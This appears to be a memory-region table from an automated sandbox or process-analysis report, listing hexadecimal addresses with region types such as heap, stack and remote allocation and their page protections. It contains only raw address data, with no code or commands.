||
29C1E2E0000
|
heap
|
page read and write
|
||
1E122F80000
|
unkown
|
page read and write
|
||
4D1FFFE000
|
stack
|
page read and write
|
||
C0F000
|
stack
|
page read and write
|
||
216AF6E0000
|
heap
|
page read and write
|
||
6FC000
|
stack
|
page read and write
|
||
18E58805000
|
heap
|
page read and write
|
||
2AC32F00000
|
heap
|
page read and write
|
||
7FF796FB1000
|
unkown
|
page execute read
|
||
182AE180000
|
unkown
|
page read and write
|
||
29C1E207000
|
heap
|
page read and write
|
||
18E5A826000
|
heap
|
page read and write
|
||
29C1E661000
|
heap
|
page read and write
|
||
21271980000
|
heap
|
page read and write
|
||
1F505B70000
|
unkown
|
page read and write
|
||
EBBE0FC000
|
stack
|
page read and write
|
||
237F57C0000
|
heap
|
page read and write
|
||
27DB5020000
|
heap
|
page read and write
|
||
18E5AA77000
|
heap
|
page read and write
|
||
278584CC000
|
heap
|
page read and write
|
||
27DB7024000
|
heap
|
page read and write
|
||
29C1E6AA000
|
heap
|
page read and write
|
||
18E587CC000
|
heap
|
page read and write
|
||
327E000
|
stack
|
page read and write
|
||
90E000
|
stack
|
page read and write
|
||
34E2000
|
heap
|
page read and write
|
||
27DB6E10000
|
heap
|
page read and write
|
||
29C1EA9D000
|
heap
|
page read and write
|
||
1E123060000
|
heap
|
page read and write
|
||
29C1E301000
|
heap
|
page read and write
|
||
29C1C470000
|
heap
|
page read and write
|
||
1EEDCB92000
|
heap
|
page read and write
|
||
573E2FF000
|
stack
|
page read and write
|
||
A91F6FF000
|
stack
|
page read and write
|
||
29C1E667000
|
heap
|
page read and write
|
||
18E5A626000
|
heap
|
page read and write
|
||
33D6000
|
heap
|
page read and write
|
||
237F5822000
|
heap
|
page read and write
|
||
27DB6EEF000
|
heap
|
page read and write
|
||
27DB6FAE000
|
heap
|
page read and write
|
||
18E5AC14000
|
heap
|
page read and write
|
||
17782170000
|
heap
|
page read and write
|
||
527E0FE000
|
stack
|
page read and write
|
||
18E5A64A000
|
heap
|
page read and write
|
||
27DB5028000
|
heap
|
page read and write
|
||
29C1E729000
|
heap
|
page read and write
|
||
27858C02000
|
heap
|
page read and write
|
||
2AC33063000
|
heap
|
page read and write
|
||
2DF0000
|
remote allocation
|
page read and write
|
||
27858513000
|
heap
|
page read and write
|
||
3151000
|
heap
|
page read and write
|
||
18E587E6000
|
heap
|
page read and write
|
||
A6979FE000
|
stack
|
page read and write
|
||
2AC3305A000
|
heap
|
page read and write
|
||
2852F84A000
|
heap
|
page read and write
|
||
18E5A826000
|
heap
|
page read and write
|
||
27DB6E54000
|
heap
|
page read and write
|
||
2852F813000
|
heap
|
page read and write
|
||
231CE370000
|
trusted library allocation
|
page read and write
|
||
7FF6FC357000
|
unkown
|
page readonly
|
||
221E5E19000
|
heap
|
page read and write
|
||
29C1E6AF000
|
heap
|
page read and write
|
||
1AFAEC29000
|
heap
|
page read and write
|
||
17782030000
|
heap
|
page read and write
|
||
27DB7036000
|
heap
|
page read and write
|
||
18E5ABC5000
|
heap
|
page read and write
|
||
18E5A6FA000
|
heap
|
page read and write
|
||
1840CB81000
|
heap
|
page read and write
|
||
1C82BB13000
|
heap
|
page read and write
|
||
29C1E68B000
|
heap
|
page read and write
|
||
29C1E732000
|
heap
|
page read and write
|
||
29C1E3D9000
|
heap
|
page read and write
|
||
29C1E3D1000
|
heap
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
18E5AB31000
|
heap
|
page read and write
|
||
5B376BB000
|
stack
|
page read and write
|
||
29C1E221000
|
heap
|
page read and write
|
||
4EAC000
|
trusted library allocation
|
page read and write
|
||
29C1E45C000
|
heap
|
page read and write
|
||
27DB7400000
|
heap
|
page read and write
|
||
EBBDA7B000
|
stack
|
page read and write
|
||
18E5A66A000
|
heap
|
page read and write
|
||
1EEDC252000
|
heap
|
page read and write
|
||
1F505C4C000
|
heap
|
page read and write
|
||
7FF64349A000
|
unkown
|
page readonly
|
||
29C1E320000
|
heap
|
page read and write
|
||
18E5A743000
|
heap
|
page read and write
|
||
29C1E729000
|
heap
|
page read and write
|
||
3167000
|
heap
|
page read and write
|
||
18E5A911000
|
heap
|
page read and write
|
||
2785846E000
|
heap
|
page read and write
|
||
18E5A66A000
|
heap
|
page read and write
|
||
EE6B0F7000
|
stack
|
page read and write
|
||
221E5A93000
|
heap
|
page read and write
|
||
29C1E71E000
|
heap
|
page read and write
|
||
32BE000
|
heap
|
page read and write
|
||
29C1E6AE000
|
heap
|
page read and write
|
||
34D1000
|
heap
|
page read and write
|
||
29C1C548000
|
heap
|
page read and write
|
||
18E5A76E000
|
heap
|
page read and write
|
||
2C0000
|
heap
|
page read and write
|
||
7FFC23561000
|
unkown
|
page execute read
|
||
27DB72FA000
|
heap
|
page read and write
|
||
D0236FE000
|
stack
|
page read and write
|
||
B5D000
|
stack
|
page read and write
|
||
3167000
|
heap
|
page read and write
|
||
2852F83D000
|
heap
|
page read and write
|
||
1AFAEB90000
|
remote allocation
|
page read and write
|
||
182AE3A9000
|
heap
|
page read and write
|
||
3D0000
|
trusted library allocation
|
page read and write
|
||
1EEDC257000
|
heap
|
page read and write
|
||
18E5A64A000
|
heap
|
page read and write
|
||
29C1E4BD000
|
heap
|
page read and write
|
||
221E5A10000
|
unkown
|
page readonly
|
||
27DB6EBB000
|
heap
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
18E5AC90000
|
heap
|
page read and write
|
||
7FF796FB0000
|
unkown
|
page readonly
|
||
18E5A66F000
|
heap
|
page read and write
|
||
18E5AAA2000
|
heap
|
page read and write
|
||
27DB7438000
|
heap
|
page read and write
|
||
18E5A6FA000
|
heap
|
page read and write
|
||
27DB6FBE000
|
heap
|
page read and write
|
||
29812613000
|
heap
|
page read and write
|
||
33DE000
|
heap
|
page read and write
|
||
18E5ABDC000
|
heap
|
page read and write
|
||
2AC3306B000
|
heap
|
page read and write
|
||
27DB6F95000
|
heap
|
page read and write
|
||
27DB733F000
|
heap
|
page read and write
|
||
1EEDC23C000
|
heap
|
page read and write
|
||
27DB6F9F000
|
heap
|
page read and write
|
||
18E5AB33000
|
heap
|
page read and write
|
||
18E5ABDC000
|
heap
|
page read and write
|
||
F6F36FC000
|
stack
|
page read and write
|
||
459237C000
|
stack
|
page read and write
|
||
18E5A626000
|
heap
|
page read and write
|
||
27DB7024000
|
heap
|
page read and write
|
||
29C1E3CC000
|
heap
|
page read and write
|
||
27DB6FAC000
|
heap
|
page read and write
|
||
2852F800000
|
heap
|
page read and write
|
||
18E5AAEB000
|
heap
|
page read and write
|
||
34E2000
|
heap
|
page read and write
|
||
29C1E484000
|
heap
|
page read and write
|
||
29C1E6DC000
|
heap
|
page read and write
|
||
7FF796FB0000
|
unkown
|
page readonly
|
||
27DB50A6000
|
heap
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
32B7000
|
heap
|
page read and write
|
||
30A7000
|
heap
|
page read and write
|
||
7FF79749A000
|
unkown
|
page readonly
|
||
18E5AA97000
|
heap
|
page read and write
|
||
1840CB5F000
|
heap
|
page read and write
|
||
2E17000
|
heap
|
page read and write
|
||
4ACF000
|
trusted library allocation
|
page read and write
|
||
27DB6FB6000
|
heap
|
page read and write
|
||
34CD000
|
heap
|
page read and write
|
||
2936FFE000
|
unkown
|
page read and write
|
||
29812602000
|
heap
|
page read and write
|
||
182AE3AA000
|
heap
|
page read and write
|
||
56D1EFA000
|
stack
|
page read and write
|
||
29C1E693000
|
heap
|
page read and write
|
||
1AFAEB30000
|
heap
|
page read and write
|
||
573E1FF000
|
stack
|
page read and write
|
||
27DB6FAD000
|
heap
|
page read and write
|
||
27DB7024000
|
heap
|
page read and write
|
||
18E5A758000
|
heap
|
page read and write
|
||
18E5A751000
|
heap
|
page read and write
|
||
27DB7014000
|
heap
|
page read and write
|
||
18E5A745000
|
heap
|
page read and write
|
||
182AE342000
|
heap
|
page read and write
|
||
1EEDC288000
|
heap
|
page read and write
|
||
A697AFF000
|
stack
|
page read and write
|
||
1B09F2C0000
|
heap
|
page read and write
|
||
29C1E3A3000
|
heap
|
page read and write
|
||
29C1E229000
|
heap
|
page read and write
|
||
1F505C74000
|
heap
|
page read and write
|
||
29C1E729000
|
heap
|
page read and write
|
||
1B09F424000
|
heap
|
page read and write
|
||
29C1E2DF000
|
heap
|
page read and write
|
||
237F57CB000
|
heap
|
page read and write
|
||
1F505C74000
|
heap
|
page read and write
|
||
29C1E990000
|
heap
|
page read and write
|
||
231CEBC0000
|
trusted library allocation
|
page read and write
|
||
27DB6FAD000
|
heap
|
page read and write
|
||
18E5A81C000
|
heap
|
page read and write
|
||
32B0000
|
heap
|
page read and write
|
||
29C1E241000
|
heap
|
page read and write
|
||
1F505BEC000
|
heap
|
page read and write
|
||
1E1230F9000
|
heap
|
page read and write
|
||
7FFC23C60000
|
unkown
|
page readonly
|
||
1E122F70000
|
unkown
|
page readonly
|
||
27DB6E13000
|
heap
|
page read and write
|
||
29C1E729000
|
heap
|
page read and write
|
||
1C82BFA0000
|
trusted library allocation
|
page read and write
|
||
29C1C320000
|
heap
|
page read and write
|
||
7FF6FBF71000
|
unkown
|
page execute read
|
||
1EEDC243000
|
heap
|
page read and write
|
||
4D1FAFB000
|
stack
|
page read and write
|
||
27DB7043000
|
heap
|
page read and write
|
||
25708A5E000
|
heap
|
page read and write
|
||
18E5A834000
|
heap
|
page read and write
|
||
18E5ABAF000
|
heap
|
page read and write
|
||
27858D13000
|
heap
|
page read and write
|
||
27DB5099000
|
heap
|
page read and write
|
||
18E5AB3D000
|
heap
|
page read and write
|
||
231CDFB8000
|
heap
|
page read and write
|
||
29812678000
|
heap
|
page read and write
|
||
29C1E3D9000
|
heap
|
page read and write
|
||
1F505C6C000
|
heap
|
page read and write
|
||
257087F0000
|
heap
|
page read and write
|
||
27DB505C000
|
heap
|
page read and write
|
||
7FF7974EB000
|
unkown
|
page read and write
|
||
18E5AB8C000
|
heap
|
page read and write
|
||
27DB6E6D000
|
heap
|
page read and write
|
||
34D9000
|
heap
|
page read and write
|
||
29C1E45C000
|
heap
|
page read and write
|
||
29C1E729000
|
heap
|
page read and write
|
||
29C1C559000
|
heap
|
page read and write
|
||
34D9000
|
heap
|
page read and write
|
||
29C1E6E9000
|
heap
|
page read and write
|
||
BCE000
|
stack
|
page read and write
|
||
27DB7271000
|
heap
|
page read and write
|
||
18E5AA7A000
|
heap
|
page read and write
|
||
A91EB83000
|
stack
|
page read and write
|
||
221E5A10000
|
unkown
|
page readonly
|
||
7FF6FBF71000
|
unkown
|
page execute read
|
||
1840CB4B000
|
heap
|
page read and write
|
||
1AFAEC00000
|
heap
|
page read and write
|
||
27DB7026000
|
heap
|
page read and write
|
||
18E5AB3D000
|
heap
|
page read and write
|
||
257089E0000
|
heap
|
page read and write
|
||
29C1E66A000
|
heap
|
page read and write
|
||
29C1E3CE000
|
heap
|
page read and write
|
||
221E5A50000
|
heap
|
page read and write
|
||
25708C80000
|
heap
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
7FF6FBF71000
|
unkown
|
page execute read
|
||
33B0000
|
heap
|
page read and write
|
||
27DB6F95000
|
heap
|
page read and write
|
||
27DB50CC000
|
heap
|
page read and write
|
||
18E5A644000
|
heap
|
page read and write
|
||
27DB7400000
|
heap
|
page read and write
|
||
29C1E981000
|
heap
|
page read and write
|
||
18E5A68A000
|
heap
|
page read and write
|
||
27DB6E27000
|
heap
|
page read and write
|
||
18E587E3000
|
heap
|
page read and write
|
||
29C1E3CA000
|
heap
|
page read and write
|
||
EE69EFD000
|
stack
|
page read and write
|
||
34CD000
|
heap
|
page read and write
|
||
2E01000
|
heap
|
page read and write
|
||
29C1E667000
|
heap
|
page read and write
|
||
18E5AB33000
|
heap
|
page read and write
|
||
34D1000
|
heap
|
page read and write
|
||
7FF79749A000
|
unkown
|
page readonly
|
||
18E5AB80000
|
heap
|
page read and write
|
||
2AC33660000
|
trusted library allocation
|
page read and write
|
||
18E5AC14000
|
heap
|
page read and write
|
||
2E0F000
|
heap
|
page read and write
|
||
29C1E333000
|
heap
|
page read and write
|
||
290320C0000
|
heap
|
page read and write
|
||
2E0A000
|
heap
|
page read and write
|
||
29C1E729000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
27DB7550000
|
heap
|
page read and write
|
||
27DB7341000
|
heap
|
page read and write
|
||
29C1E28D000
|
heap
|
page read and write
|
||
29812629000
|
heap
|
page read and write
|
||
32C0000
|
heap
|
page read and write
|
||
29C1C500000
|
heap
|
page read and write
|
||
18E58845000
|
heap
|
page read and write
|
||
29C1E229000
|
heap
|
page read and write
|
||
3675000
|
heap
|
page read and write
|
||
231CE365000
|
heap
|
page read and write
|
||
27DB7334000
|
heap
|
page read and write
|
||
29C1C557000
|
heap
|
page read and write
|
||
21271D69000
|
heap
|
page read and write
|
||
1EEDC276000
|
heap
|
page read and write
|
||
29C1E3CA000
|
heap
|
page read and write
|
||
27DB6E79000
|
heap
|
page read and write
|
||
A40000
|
heap
|
page read and write
|
||
390000
|
remote allocation
|
page read and write
|
||
29C1E45C000
|
heap
|
page read and write
|
||
310E000
|
stack
|
page read and write
|
||
C10000
|
trusted library allocation
|
page read and write
|
||
18E5A750000
|
heap
|
page read and write
|
||
221E5ACB000
|
heap
|
page read and write
|
||
2AC33033000
|
heap
|
page read and write
|
||
290320E0000
|
heap
|
page read and write
|
||
27DB7271000
|
heap
|
page read and write
|
||
29C1E676000
|
heap
|
page read and write
|
||
A91F0FE000
|
stack
|
page read and write
|
||
7FF64349A000
|
unkown
|
page readonly
|
||
2852F871000
|
heap
|
page read and write
|
||
29812590000
|
heap
|
page read and write
|
||
7FF642FB0000
|
unkown
|
page readonly
|
||
36C000
|
stack
|
page read and write
|
||
27DB72EC000
|
heap
|
page read and write
|
||
1AFAEB60000
|
trusted library allocation
|
page read and write
|
||
29C1E241000
|
heap
|
page read and write
|
||
1AFAEC4F000
|
heap
|
page read and write
|
||
1EEDCC13000
|
heap
|
page read and write
|
||
27DB75F5000
|
heap
|
page read and write
|
||
3231000
|
trusted library allocation
|
page read and write
|
||
27DB7340000
|
heap
|
page read and write
|
||
720000
|
remote allocation
|
page read and write
|
||
182AE397000
|
heap
|
page read and write
|
||
1B09F260000
|
heap
|
page read and write
|
||
29C1E718000
|
heap
|
page read and write
|
||
2D9E000
|
stack
|
page read and write
|
||
8B0000
|
heap
|
page read and write
|
||
27DB6E24000
|
heap
|
page read and write
|
||
18E5AA77000
|
heap
|
page read and write
|
||
1F505C54000
|
heap
|
page read and write
|
||
29C1C57B000
|
heap
|
page read and write
|
||
18E5ABAF000
|
heap
|
page read and write
|
||
29C1E3A2000
|
heap
|
page read and write
|
||
221E5AEB000
|
heap
|
page read and write
|
||
35DE000
|
stack
|
page read and write
|
||
18E5A69A000
|
heap
|
page read and write
|
||
527DCFF000
|
stack
|
page read and write
|
||
27DB733F000
|
heap
|
page read and write
|
||
29C1E3C2000
|
heap
|
page read and write
|
||
2719C2E5000
|
heap
|
page read and write
|
||
27DB7042000
|
heap
|
page read and write
|
||
2CCE000
|
stack
|
page read and write
|
||
34D1000
|
heap
|
page read and write
|
||
29C1E45D000
|
heap
|
page read and write
|
||
7FF6FC4AD000
|
unkown
|
page readonly
|
||
29C1C4FE000
|
heap
|
page read and write
|
||
27858D3A000
|
heap
|
page read and write
|
||
237F57E2000
|
heap
|
page read and write
|
||
29C1E3D9000
|
heap
|
page read and write
|
||
7FF6FC4A4000
|
unkown
|
page write copy
|
||
FA25A7E000
|
stack
|
page read and write
|
||
29C1E906000
|
heap
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
1778217E000
|
heap
|
page read and write
|
||
34E2000
|
heap
|
page read and write
|
||
18E5ABC5000
|
heap
|
page read and write
|
||
C20000
|
heap
|
page read and write
|
||
1840D100000
|
heap
|
page read and write
|
||
18E5A64A000
|
heap
|
page read and write
|
||
2AC33041000
|
heap
|
page read and write
|
||
27DB5118000
|
heap
|
page read and write
|
||
1C82BB00000
|
heap
|
page read and write
|
||
29C1E50F000
|
heap
|
page read and write
|
||
7FF6FC4AD000
|
unkown
|
page readonly
|
||
29C1E72B000
|
heap
|
page read and write
|
||
2852F913000
|
heap
|
page read and write
|
||
CCF667B000
|
stack
|
page read and write
|
||
216AF460000
|
heap
|
page read and write
|
||
18E5A64C000
|
heap
|
page read and write
|
||
29C1E3A2000
|
heap
|
page read and write
|
||
527DEFE000
|
stack
|
page read and write
|
||
29C1E6BD000
|
heap
|
page read and write
|
||
EBBE1FE000
|
stack
|
page read and write
|
||
18E5A77C000
|
heap
|
page read and write
|
||
27DB729B000
|
heap
|
page read and write
|
||
29C1E4ED000
|
heap
|
page read and write
|
||
EBBDDFE000
|
stack
|
page read and write
|
||
29C1E360000
|
heap
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
18E5AA71000
|
heap
|
page read and write
|
||
5CE000
|
stack
|
page read and write
|
||
29C1C542000
|
heap
|
page read and write
|
||
290322A0000
|
heap
|
page read and write
|
||
34C0000
|
heap
|
page read and write
|
||
A6975FF000
|
stack
|
page read and write
|
||
96E000
|
stack
|
page read and write
|
||
29C1E241000
|
heap
|
page read and write
|
||
2852F84C000
|
heap
|
page read and write
|
||
7FF796FB1000
|
unkown
|
page execute read
|
||
18E5A827000
|
heap
|
page read and write
|
||
303E000
|
stack
|
page read and write
|
||
29C1E354000
|
heap
|
page read and write
|
||
1840CB99000
|
heap
|
page read and write
|
||
7FF642FB1000
|
unkown
|
page execute read
|
||
29812670000
|
heap
|
page read and write
|
||
18E5A77C000
|
heap
|
page read and write
|
||
18E5A6CF000
|
heap
|
page read and write
|
||
1C82BA64000
|
heap
|
page read and write
|
||
221E5AD5000
|
heap
|
page read and write
|
||
221E5A87000
|
heap
|
page read and write
|
||
18E5A826000
|
heap
|
page read and write
|
||
34C0000
|
heap
|
page read and write
|
||
29C1E708000
|
heap
|
page read and write
|
||
221E5ACB000
|
heap
|
page read and write
|
||
29C1E3A2000
|
heap
|
page read and write
|
||
29C1C57B000
|
heap
|
page read and write
|
||
29C1E2BC000
|
heap
|
page read and write
|
||
18E5AB44000
|
heap
|
page read and write
|
||
1C82C002000
|
trusted library allocation
|
page read and write
|
||
2AC3302E000
|
heap
|
page read and write
|
||
29C1EA60000
|
heap
|
page read and write
|
||
2AC3307C000
|
heap
|
page read and write
|
||
29C1E321000
|
heap
|
page read and write
|
||
1EEDCB00000
|
heap
|
page read and write
|
||
2AC33062000
|
heap
|
page read and write
|
||
1EEDCC23000
|
heap
|
page read and write
|
||
18E587C6000
|
heap
|
page read and write
|
||
21271970000
|
unkown
|
page read and write
|
||
27DB733F000
|
heap
|
page read and write
|
||
29C1E39D000
|
heap
|
page read and write
|
||
27DB7024000
|
heap
|
page read and write
|
||
29C1C575000
|
heap
|
page read and write
|
||
18E5ABA0000
|
heap
|
page read and write
|
||
29C1E2E4000
|
heap
|
page read and write
|
||
1EEDCBB0000
|
heap
|
page read and write
|
||
5AAAF79000
|
stack
|
page read and write
|
||
1778213F000
|
heap
|
page read and write
|
||
18E5A755000
|
heap
|
page read and write
|
||
59D3FFF000
|
stack
|
page read and write
|
||
1C82BA62000
|
heap
|
page read and write
|
||
573E4FF000
|
stack
|
page read and write
|
||
18E5A81C000
|
heap
|
page read and write
|
||
27DB7328000
|
heap
|
page read and write
|
||
96F9FFF000
|
unkown
|
page read and write
|
||
29C1E3CE000
|
heap
|
page read and write
|
||
34C9000
|
heap
|
page read and write
|
||
B6D000
|
stack
|
page read and write
|
||
7FF6FC45A000
|
unkown
|
page readonly
|
||
27DB732E000
|
heap
|
page read and write
|
||
18E5A2C0000
|
heap
|
page read and write
|
||
18E5ABA4000
|
heap
|
page read and write
|
||
27DB7047000
|
heap
|
page read and write
|
||
18E5AB52000
|
heap
|
page read and write
|
||
323E000
|
stack
|
page read and write
|
||
EE6A9FF000
|
stack
|
page read and write
|
||
29C1E661000
|
heap
|
page read and write
|
||
EE6A5FE000
|
stack
|
page read and write
|
||
29C1C527000
|
heap
|
page read and write
|
||
29C1E3D1000
|
heap
|
page read and write
|
||
34D1000
|
heap
|
page read and write
|
||
9B0000
|
heap
|
page read and write
|
||
29C1E3DA000
|
heap
|
page read and write
|
||
17782035000
|
heap
|
page read and write
|
||
27DB6F98000
|
heap
|
page read and write
|
||
49C0000
|
trusted library allocation
|
page read and write
|
||
F9A787C000
|
stack
|
page read and write
|
||
29C1E3A2000
|
heap
|
page read and write
|
||
33D6000
|
heap
|
page read and write
|
||
316F000
|
heap
|
page read and write
|
||
806DCFF000
|
stack
|
page read and write
|
||
29C1E276000
|
heap
|
page read and write
|
||
18E5A66F000
|
heap
|
page read and write
|
||
25708950000
|
heap
|
page read and write
|
||
EE69DFE000
|
stack
|
page read and write
|
||
2852F710000
|
heap
|
page read and write
|
||
1EEDC200000
|
heap
|
page read and write
|
||
EE6A3FE000
|
stack
|
page read and write
|
||
27DB6FB3000
|
heap
|
page read and write
|
||
2E17000
|
heap
|
page read and write
|
||
21271A37000
|
heap
|
page read and write
|
||
2719C010000
|
heap
|
page read and write
|
||
18E5ABA0000
|
heap
|
page read and write
|
||
7FF7974E6000
|
unkown
|
page write copy
|
||
E0B419C000
|
stack
|
page read and write
|
||
18E5A826000
|
heap
|
page read and write
|
||
231CEC40000
|
trusted library allocation
|
page read and write
|
||
29C1E4ED000
|
heap
|
page read and write
|
||
25708C85000
|
heap
|
page read and write
|
||
18E5AA71000
|
heap
|
page read and write
|
||
7FF64349A000
|
unkown
|
page readonly
|
||
29C1E72B000
|
heap
|
page read and write
|
||
27DB6FE7000
|
heap
|
page read and write
|
||
29C1C5B9000
|
heap
|
page read and write
|
||
1B09F445000
|
heap
|
page read and write
|
||
18E5A81F000
|
heap
|
page read and write
|
||
1778216A000
|
heap
|
page read and write
|
||
A697CFF000
|
stack
|
page read and write
|
||
27DB7313000
|
heap
|
page read and write
|
||
18E5AB3A000
|
heap
|
page read and write
|
||
348E000
|
stack
|
page read and write
|
||
59D3EFE000
|
stack
|
page read and write
|
||
59D41FE000
|
stack
|
page read and write
|
||
18E5AB52000
|
heap
|
page read and write
|
||
29C1E674000
|
heap
|
page read and write
|
||
231CE001000
|
heap
|
page read and write
|
||
27DB6F90000
|
heap
|
page read and write
|
||
27DB6E7B000
|
heap
|
page read and write
|
||
2E17000
|
heap
|
page read and write
|
||
2D10000
|
heap
|
page read and write
|
||
29C1E72B000
|
heap
|
page read and write
|
||
CCF6AFF000
|
stack
|
page read and write
|
||
5D0000
|
trusted library allocation
|
page read and write
|
||
27DB6FA7000
|
heap
|
page read and write
|
||
2E0A000
|
heap
|
page read and write
|
||
E7C974D000
|
stack
|
page read and write
|
||
27DB6FAB000
|
heap
|
page read and write
|
||
3630000
|
trusted library allocation
|
page read and write
|
||
1E808A80000
|
unkown
|
page readonly
|
||
221E5A20000
|
unkown
|
page readonly
|
||
1778212C000
|
heap
|
page read and write
|
||
27DB72CD000
|
heap
|
page read and write
|
||
18E5AB31000
|
heap
|
page read and write
|
||
29C1E72B000
|
heap
|
page read and write
|
||
29C1E35E000
|
heap
|
page read and write
|
||
27DB6E3D000
|
heap
|
page read and write
|
||
A56000
|
heap
|
page read and write
|
||
27DB4FD0000
|
heap
|
page read and write
|
||
29C1E334000
|
heap
|
page read and write
|
||
221E5E19000
|
heap
|
page read and write
|
||
30E0000
|
heap
|
page read and write
|
||
29372FE000
|
stack
|
page read and write
|
||
29C1E97B000
|
heap
|
page read and write
|
||
7FFC23C77000
|
unkown
|
page readonly
|
||
6BD000
|
stack
|
page read and write
|
||
182AE160000
|
unkown
|
page readonly
|
||
29C1C516000
|
heap
|
page read and write
|
||
21271950000
|
unkown
|
page readonly
|
||
1E808A70000
|
unkown
|
page readonly
|
||
29C1E2AD000
|
heap
|
page read and write
|
||
17782020000
|
heap
|
page read and write
|
||
34E2000
|
heap
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
18E5A730000
|
heap
|
page read and write
|
||
29C1E3D9000
|
heap
|
page read and write
|
||
29C1E4ED000
|
heap
|
page read and write
|
||
806DFF2000
|
stack
|
page read and write
|
||
C10000
|
trusted library allocation
|
page read and write
|
||
182B0230000
|
heap
|
page read and write
|
||
27DB7525000
|
heap
|
page read and write
|
||
18E5A77C000
|
heap
|
page read and write
|
||
27DB50A0000
|
heap
|
page read and write
|
||
2E0F000
|
heap
|
page read and write
|
||
27DB6F95000
|
heap
|
page read and write
|
||
27DB6E46000
|
heap
|
page read and write
|
||
30AF000
|
heap
|
page read and write
|
||
27DB6EEF000
|
heap
|
page read and write
|
||
27DB72AA000
|
heap
|
page read and write
|
||
29C1E2C6000
|
heap
|
page read and write
|
||
2AC33078000
|
heap
|
page read and write
|
||
29C1E6C0000
|
heap
|
page read and write
|
||
CCF6BFF000
|
stack
|
page read and write
|
||
231CEBD0000
|
trusted library allocation
|
page read and write
|
||
18E58800000
|
heap
|
page read and write
|
||
27DB4FF0000
|
heap
|
page read and write
|
||
1F507B80000
|
heap
|
page read and write
|
||
A91FAFE000
|
stack
|
page read and write
|
||
70E000
|
stack
|
page read and write
|
||
29C1E4ED000
|
heap
|
page read and write
|
||
2AC3305D000
|
heap
|
page read and write
|
||
27DB50B3000
|
heap
|
page read and write
|
||
29C1C56F000
|
heap
|
page read and write
|
||
1778217E000
|
heap
|
page read and write
|
||
18E5A734000
|
heap
|
page read and write
|
||
27DB7338000
|
heap
|
page read and write
|
||
18E5A6C3000
|
heap
|
page read and write
|
||
27DB7271000
|
heap
|
page read and write
|
||
21271960000
|
unkown
|
page readonly
|
||
28531330000
|
remote allocation
|
page read and write
|
||
29C1E240000
|
heap
|
page read and write
|
||
29C1E4DD000
|
heap
|
page read and write
|
||
7FFC23C61000
|
unkown
|
page execute read
|
||
34CD000
|
heap
|
page read and write
|
||
18E5A81C000
|
heap
|
page read and write
|
||
2852F88D000
|
heap
|
page read and write
|
||
27DB7026000
|
heap
|
page read and write
|
||
1E808A90000
|
unkown
|
page read and write
|
||
59D3DFF000
|
stack
|
page read and write
|
||
231CEE80000
|
trusted library allocation
|
page read and write
|
||
29C1E464000
|
heap
|
page read and write
|
||
29C1E4DD000
|
heap
|
page read and write
|
||
1840CB9A000
|
heap
|
page read and write
|
||
18E587DE000
|
heap
|
page read and write
|
||
29C1E373000
|
heap
|
page read and write
|
||
34CD000
|
heap
|
page read and write
|
||
27DB6FAC000
|
heap
|
page read and write
|
||
182AE3A7000
|
heap
|
page read and write
|
||
27DB7024000
|
heap
|
page read and write
|
||
27DB5095000
|
heap
|
page read and write
|
||
1C82BA28000
|
heap
|
page read and write
|
||
221E5A8D000
|
heap
|
page read and write
|
||
18E5A610000
|
heap
|
page read and write
|
||
29C1E4ED000
|
heap
|
page read and write
|
||
390000
|
remote allocation
|
page read and write
|
||
18E58750000
|
heap
|
page read and write
|
||
29C1E300000
|
heap
|
page read and write
|
||
315F000
|
heap
|
page read and write
|
||
1840CB80000
|
heap
|
page read and write
|
||
7FF7974ED000
|
unkown
|
page readonly
|
||
806D6FF000
|
stack
|
page read and write
|
||
FA2573C000
|
stack
|
page read and write
|
||
56D21F9000
|
stack
|
page read and write
|
||
18E5A827000
|
heap
|
page read and write
|
||
18E5AB48000
|
heap
|
page read and write
|
||
27DB7050000
|
heap
|
page read and write
|
||
18E5A77C000
|
heap
|
page read and write
|
||
29C1E738000
|
heap
|
page read and write
|
||
7FF796FB1000
|
unkown
|
page execute read
|
||
2E0F000
|
heap
|
page read and write
|
||
18E5A745000
|
heap
|
page read and write
|
||
27DB7047000
|
heap
|
page read and write
|
||
29C1DDB5000
|
heap
|
page read and write
|
||
221E5ACE000
|
heap
|
page read and write
|
||
18E5A835000
|
heap
|
page read and write
|
||
29C1E277000
|
heap
|
page read and write
|
||
18E5AB3D000
|
heap
|
page read and write
|
||
7FFC23560000
|
unkown
|
page readonly
|
||
29C1EB23000
|
heap
|
page read and write
|
||
A91FBFF000
|
stack
|
page read and write
|
||
27DB733F000
|
heap
|
page read and write
|
||
18E5A82F000
|
heap
|
page read and write
|
||
278584BB000
|
heap
|
page read and write
|
||
18E587D2000
|
heap
|
page read and write
|
||
29C1E244000
|
heap
|
page read and write
|
||
27DB7271000
|
heap
|
page read and write
|
||
27DB733F000
|
heap
|
page read and write
|
||
27DB6E13000
|
heap
|
page read and write
|
||
18E5A0E0000
|
heap
|
page read and write
|
||
18E5A77C000
|
heap
|
page read and write
|
||
5AAB0FF000
|
stack
|
page read and write
|
||
7FF6FC4A6000
|
unkown
|
page write copy
|
||
2852F780000
|
heap
|
page read and write
|
||
27DB7024000
|
heap
|
page read and write
|
||
7E0000
|
trusted library allocation
|
page read and write
|
||
A91F9FE000
|
stack
|
page read and write
|
||
7FF6FC357000
|
unkown
|
page readonly
|
||
27DB6E46000
|
heap
|
page read and write
|
||
18E587BD000
|
heap
|
page read and write
|
||
B90000
|
remote allocation
|
page read and write
|
||
18E5A81C000
|
heap
|
page read and write
|
||
221E5AD2000
|
heap
|
page read and write
|
||
27DB7271000
|
heap
|
page read and write
|
||
27DB509D000
|
heap
|
page read and write
|
||
27DB6E7F000
|
heap
|
page read and write
|
||
18E5AB3D000
|
heap
|
page read and write
|
||
2E01000
|
heap
|
page read and write
|
||
2AC33068000
|
heap
|
page read and write
|
||
18E5AB80000
|
heap
|
page read and write
|
||
A9201F8000
|
stack
|
page read and write
|
||
3159000
|
heap
|
page read and write
|
||
EE6A1FF000
|
stack
|
page read and write
|
||
29C1E26F000
|
heap
|
page read and write
|
||
18E5A826000
|
heap
|
page read and write
|
||
29C1E992000
|
heap
|
page read and write
|
||
29C1E68B000
|
heap
|
page read and write
|
||
2C50000
|
heap
|
